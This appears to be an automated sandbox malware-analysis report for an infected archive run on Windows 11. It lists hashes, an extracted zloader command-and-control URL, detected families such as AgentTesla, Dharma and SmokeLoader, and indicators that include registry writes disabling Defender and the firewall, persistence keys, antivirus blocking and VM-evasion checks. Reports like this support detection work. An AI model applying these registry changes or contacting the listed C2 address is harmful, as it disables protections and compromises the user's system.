Analysis
-
max time kernel
295s -
max time network
412s -
platform
windows11-21h2_x64 -
resource
win11-20241007-en -
resource tags
arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system -
submitted
18-01-2025 16:31
Static task
static1
Behavioral task
behavioral1
Sample
241105-dtxrgatbpg_pw_infected.zip
Resource
win11-20241007-en
General
-
Target
241105-dtxrgatbpg_pw_infected.zip
-
Size
132.7MB
-
MD5
136b5aad00be845ec166ae8f6343b335
-
SHA1
e51860dfb734c9715b6c9b74d9c582abe03ca90c
-
SHA256
38bc13ef112b2f17d4d1a80243fac6a521b5d58228984aae0752d79487fa3b66
-
SHA512
ed56b1afa85e304d6973d69e289631f15955d1619c6943a376d7d319018057d1a6fa0aa340ea6d43037ee17014f13e74e5ebddaf3aec62bf8e2da6b20b14ce42
-
SSDEEP
3145728:m2t5SZQXkJuAwd3u5d5VO4Z9WSXL5qgP47khuJWCvcICllCCrE/z:m6ClwdeyqWSXVqeU5J7CvCCrgz
Malware Config
Extracted
zloader
bot7
bot7
https://militanttra.at/owg.php
-
build_id
18
Signatures
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
-
Agenttesla family
-
Betabot family
-
Dharma
Dharma is a ransomware that uses security software installation to hide malicious activities.
-
Dharma family
-
ModiLoader, DBatLoader
ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.
-
Modifies WinLogon for persistence 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, C:\\Users\\Admin\\WinService.exe" Clipper.exe Set value (str) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, C:\\Users\\Admin\\WinService.exe" Clipper.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" update.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" update.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" update.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRawWriteNotification = "1" update.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection update.exe -
Modifies firewall policy service 3 TTPs 40 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile explorer.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\EnableFirewall = "0" explorer.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile\EnableFirewall = "0" explorer.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile\EnableFirewall = "0" explorer.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile explorer.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile explorer.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile explorer.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile\EnableFirewall = "0" explorer.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile\EnableFirewall = "0" explorer.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile explorer.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile explorer.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile\EnableFirewall = "0" explorer.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\EnableFirewall = "0" explorer.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\EnableFirewall = "0" explorer.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile\EnableFirewall = "0" explorer.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile\EnableFirewall = "0" explorer.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile\EnableFirewall = "0" explorer.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile\EnableFirewall = "0" explorer.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile explorer.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile explorer.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile explorer.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile explorer.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile explorer.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile explorer.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile explorer.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\EnableFirewall = "0" explorer.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\EnableFirewall = "0" explorer.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\EnableFirewall = "0" explorer.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile explorer.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile explorer.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\EnableFirewall = "0" explorer.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile explorer.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile explorer.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile explorer.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\EnableFirewall = "0" explorer.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile explorer.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile\EnableFirewall = "0" explorer.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\EnableFirewall = "0" explorer.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile explorer.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\EnableFirewall = "0" explorer.exe -
Modifies visiblity of hidden/system files in Explorer 2 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" taskhost.exe -
Modiloader family
-
RevengeRAT
Remote-access trojan with a wide range of capabilities.
-
Revengerat family
-
Rms family
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Smokeloader family
-
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths regedit.exe -
Zloader family
-
AgentTesla payload 1 IoCs
resource yara_rule behavioral1/memory/6768-7914-0x0000000000400000-0x0000000000452000-memory.dmp family_agenttesla -
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Looks for VirtualBox Guest Additions in registry 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Oracle\VirtualBox Guest Additions 11.exe -
ModiLoader Second Stage 2 IoCs
resource yara_rule behavioral1/files/0x001900000002ac39-1122.dat modiloader_stage2 behavioral1/memory/4608-1136-0x0000000000400000-0x000000000049F000-memory.dmp modiloader_stage2 -
ReZer0 packer 3 IoCs
Detects ReZer0, a packer with multiple versions used in various campaigns.
resource yara_rule behavioral1/memory/4136-2237-0x0000000007AE0000-0x0000000007B38000-memory.dmp rezer0 behavioral1/memory/3956-4130-0x00000000063C0000-0x0000000006418000-memory.dmp rezer0 behavioral1/memory/2840-6653-0x0000000006DD0000-0x0000000006E26000-memory.dmp rezer0 -
Remote Service Session Hijacking: RDP Hijacking 1 TTPs 2 IoCs
Adversaries may hijack a legitimate user's remote desktop session to move laterally within an environment.
pid Process 4144 net.exe 2988 net1.exe -
Renames multiple (70) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
RevengeRat Executable 1 IoCs
resource yara_rule behavioral1/files/0x001900000002ac4e-1180.dat revengerat -
Blocks application from running via registry modification 13 IoCs
Adds application to list of disallowed applications.
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\7 = "ESETOnlineScanner_RUS.exe" update.exe Set value (str) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\9 = "360TS_Setup_Mini.exe" update.exe Key created \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun update.exe Set value (str) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\1 = "eav_trial_rus.exe" update.exe Set value (str) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\3 = "eis_trial_rus.exe" update.exe Set value (str) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\4 = "essf_trial_rus.exe" update.exe Set value (str) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\5 = "hitmanpro_x64.exe" update.exe Set value (str) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\6 = "ESETOnlineScanner_UKR.exe" update.exe Set value (str) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\11 = "Cube.exe" update.exe Set value (int) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1" update.exe Set value (str) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\2 = "avast_free_antivirus_setup_online.exe" update.exe Set value (str) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\8 = "HitmanPro.exe" update.exe Set value (str) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\10 = "Cezurity_Scanner_Pro_Free.exe" update.exe -
Drops file in Drivers directory 3 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts update.exe File created C:\Windows\system32\drivers\iaStorE.sys OnlineInstaller.tmp File opened for modification C:\Windows\System32\drivers\etc\hosts cmd.exe -
Event Triggered Execution: Image File Execution Options Injection 1 TTPs 24 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ymy9m915c99k95m.exe\DisableExceptionChainValidation oof.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rstrui.exe explorer.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rstrui.exe\Debugger = "puu.exe" explorer.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rstrui.exe explorer.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rstrui.exe\Debugger = "dihjvr.exe" explorer.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\o37oc73i7.exe ou55sg33s_1.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rstrui.exe\Debugger = "wxr.exe" explorer.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rstrui.exe\Debugger = "bkps.exe" explorer.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rstrui.exe explorer.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rstrui.exe explorer.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rstrui.exe\Debugger = "buqct.exe" explorer.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rstrui.exe explorer.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rstrui.exe\Debugger = "zapgkg.exe" explorer.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rstrui.exe explorer.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rstrui.exe\Debugger = "skd.exe" explorer.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rstrui.exe explorer.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rstrui.exe\Debugger = "ufbmglht.exe" explorer.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rstrui.exe explorer.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\o37oc73i7.exe\DisableExceptionChainValidation ou55sg33s_1.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ymy9m915c99k95m.exe oof.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rstrui.exe explorer.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rstrui.exe\Debugger = "oii.exe" explorer.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rstrui.exe explorer.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rstrui.exe\Debugger = "ijue.exe" explorer.exe -
Looks for VMWare Tools registry key 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\VMware, Inc.\VMware Tools 11.exe -
Looks for VMWare services registry key. 1 TTPs 19 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\VMware openme.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\VMware explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\VMware Lonelyscreen.1.2.9.keygen.by.Paradox.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\VMware foldani.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\VMware svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\VMware TaskMan.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\VMware Remouse.Micro.Micro.v3.5.3.serial.maker.by.aaocg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\VMware VyprVPN.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\VMware ymy9m915c99k95m.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\VMware Magic_File_v3_keygen_by_KeygenNinja.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\VMware tacbvfff.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\VMware tacbvfff.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\VMware update.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\VMware ymy9m915c99k95m.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\VMware mouse_2.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\VMware msiexec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\VMware explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\VMware ymy9m915c99k95m.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\VMware 2c01b007729230c415420ad641ad92eb.exe -
Modifies Windows Firewall 2 TTPs 8 IoCs
pid Process 2964 netsh.exe 2252 netsh.exe 2988 netsh.exe 1668 netsh.exe 1852 netsh.exe 4392 netsh.exe 3580 netsh.exe 72 netsh.exe -
Server Software Component: Terminal Services DLL 1 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDll = "%ProgramFiles%\\RDP Wrapper\\rdpwrap.dll" RDPWInst.exe -
Sets file to hidden 1 TTPs 3 IoCs
Modifies file attributes to stop it showing in Explorer etc.
pid Process 3144 attrib.exe 260 attrib.exe 2456 attrib.exe -
ACProtect 1.3x - 1.4x DLL software 2 IoCs
Detects file using ACProtect software.
resource yara_rule behavioral1/files/0x0006000000025b81-304.dat acprotect behavioral1/files/0x0006000000025b80-303.dat acprotect -
resource yara_rule behavioral1/files/0x0006000000025b7a-264.dat aspack_v212_v242 -
Checks BIOS information in registry 2 TTPs 12 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion explorer.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion explorer.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion explorer.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion explorer.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion explorer.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion explorer.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion explorer.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion explorer.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion explorer.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion explorer.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 11.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 11.exe -
Checks QEMU agent file 2 TTPs 1 IoCs
Checks presence of QEMU agent, possibly to detect virtualization.
description ioc Process File opened (read-only) C:\Program Files\Qemu-ga\qemu-ga.exe 3.exe -
Drops startup file 10 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\6825da1e045502b22d4b02d4028214ab.exe svchost.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\6825da1e045502b22d4b02d4028214ab.exe svchost.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Cjnsta.vbs foldani.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\tenakt.js foldani.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\inststa.exe vbc.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\msta.exe foldani.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\msta.exe foldani.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hadiya.lnk foldani.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\elBV.URL foldani.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\16.exe 16.exe -
Executes dropped EXE 64 IoCs
pid Process 3148 update.exe 3696 Treasure.Vault.3D.Screensaver.keygen.by.Paradox.exe 3040 wwf[1].exe 3848 VyprVPN.exe 3636 WSHSetup[1].exe 3332 starticon3.exe 4852 전산 및 비전산자료 보존 요청서(20200525)_꼭 확인하시고 자료보존해주세요.exe 3524 joinResult.exe 3964 VyprVPN.exe 2976 1111.exe 3572 Clipper.exe 2396 wini.exe 2196 winit.exe 1396 WinService.exe 3916 rutserv.exe 3140 rutserv.exe 1532 rutserv.exe 1912 rutserv.exe 1876 cheat.exe 3704 taskhost.exe 2060 taskhost.exe 2204 WinService.exe 2556 winlogon.exe 2004 taskhostw.exe 3992 R8.exe 1496 Rar.exe 3028 RDPWInst.exe 4596 RDPWInst.exe 3396 MicrosoftHost.exe 2612 전산 및 비전산자료 보존 요청서(20200525)_꼭 확인하시고 자료보존해주세요1.exe 4656 svchost.exe 4360 svchost.exe 4768 Lonelyscreen.1.2.9.keygen.by.Paradox.exe 1048 LtHv0O2KZDK4M637.exe 904 Remouse.Micro.Micro.v3.5.3.serial.maker.by.aaocg.exe 2960 Magic_File_v3_keygen_by_KeygenNinja.exe 3116 OnlineInstaller.exe 2940 OnlineInstaller.tmp 2448 SecurityTaskManager_Setup.exe 3600 mouse_2.exe 1160 setup.exe 2300 openme.exe 1604 oof.exe 4608 ou55sg33s_1.exe 2924 ou55sg33s_1.exe 4420 oof.exe 224 KLwC6vii.exe 2420 taskhostw.exe 2252 TaskMan.exe 1548 tacbvfff.exe 5464 o37oc73i7.exe 5492 o37oc73i7.exe 5828 tacbvfff.exe 5984 ymy9m915c99k95m.exe 6064 ymy9m915c99k95m.exe 5168 o37oc73i7.exe 5176 o37oc73i7.exe 4612 o37oc73i7.exe 3704 o37oc73i7.exe 884 ymy9m915c99k95m.exe 964 foldani.exe 1984 foldani.exe 5652 o37oc73i7.exe 3836 o37oc73i7.exe -
Loads dropped DLL 7 IoCs
pid Process 3848 VyprVPN.exe 3524 joinResult.exe 3064 svchost.exe 2252 TaskMan.exe 2252 TaskMan.exe 2252 TaskMan.exe 2016 3.exe -
Modifies file permissions 1 TTPs 56 IoCs
pid Process 3396 icacls.exe 244 icacls.exe 2580 icacls.exe 3464 icacls.exe 4612 icacls.exe 1960 icacls.exe 876 icacls.exe 656 icacls.exe 3216 icacls.exe 2364 icacls.exe 4120 icacls.exe 1328 icacls.exe 1160 icacls.exe 1092 icacls.exe 4968 icacls.exe 3124 icacls.exe 3864 icacls.exe 4968 icacls.exe 340 icacls.exe 3028 icacls.exe 720 icacls.exe 1596 icacls.exe 2496 icacls.exe 2072 icacls.exe 4224 icacls.exe 4596 icacls.exe 1824 icacls.exe 1476 icacls.exe 572 icacls.exe 3488 icacls.exe 4252 icacls.exe 3600 icacls.exe 2580 icacls.exe 3232 icacls.exe 756 icacls.exe 4192 icacls.exe 3464 icacls.exe 1928 icacls.exe 1392 icacls.exe 3100 icacls.exe 1012 icacls.exe 2552 icacls.exe 224 icacls.exe 3600 icacls.exe 2988 icacls.exe 960 icacls.exe 884 icacls.exe 1936 icacls.exe 5016 icacls.exe 4728 icacls.exe 1908 icacls.exe 676 icacls.exe 1480 icacls.exe 3628 icacls.exe 4084 icacls.exe 4912 icacls.exe -
Obfuscated with Agile.Net obfuscator 1 IoCs
Detects use of the Agile.Net commercial obfuscator, which is capable of entity renaming and control flow obfuscation.
resource yara_rule behavioral1/memory/2552-2167-0x0000000002B20000-0x0000000002B34000-memory.dmp agile_net -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Uses the VBS compiler for execution 1 TTPs
-
Adds Run key to start application 2 TTPs 32 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Realtek HD Audio = "C:\\ProgramData\\RealtekHD\\taskhostw.exe" taskhostw.exe Set value (str) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\Google Updater 5.0 = "C:\\ProgramData\\Google Updater 5.0\\o37oc73i7.exe" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\Google Updater 5.0 = "C:\\ProgramData\\Google Updater 5.0\\o37oc73i7.exe" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Software\Microsoft\Windows\CurrentVersion\Run\Google Updater 5.0 = "\"C:\\ProgramData\\Google Updater 5.0\\o37oc73i7.exe\"" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Software\Microsoft\Windows\CurrentVersion\Run\Google Updater 5.0 = "\"C:\\ProgramData\\Google Updater 5.0\\o37oc73i7.exe\"" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\Google Updater 5.0 = "C:\\ProgramData\\Google Updater 5.0\\o37oc73i7.exe" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\Google Updater 2.0 = "C:\\ProgramData\\Google Updater 2.0\\ymy9m915c99k95m.exe" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Software\Microsoft\Windows\CurrentVersion\Run\Google Updater 5.0 = "\"C:\\ProgramData\\Google Updater 5.0\\o37oc73i7.exe\"" msiexec.exe Set value (str) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Software\Microsoft\Windows\CurrentVersion\Run\Google Updater 2.0 = "\"C:\\ProgramData\\Google Updater 2.0\\ymy9m915c99k95m.exe\"" Remouse.Micro.Micro.v3.5.3.serial.maker.by.aaocg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Software\Microsoft\Windows\CurrentVersion\Run\Google Updater 5.0 = "\"C:\\ProgramData\\Google Updater 5.0\\o37oc73i7.exe\"" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Software\Microsoft\Windows\CurrentVersion\Run\Google Updater 2.0 = "\"C:\\ProgramData\\Google Updater 2.0\\ymy9m915c99k95m.exe\"" update.exe Set value (str) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Software\Microsoft\Windows\CurrentVersion\Run\Google Updater 5.0 = "\"C:\\ProgramData\\Google Updater 5.0\\o37oc73i7.exe\"" explorer.exe Set value (str) 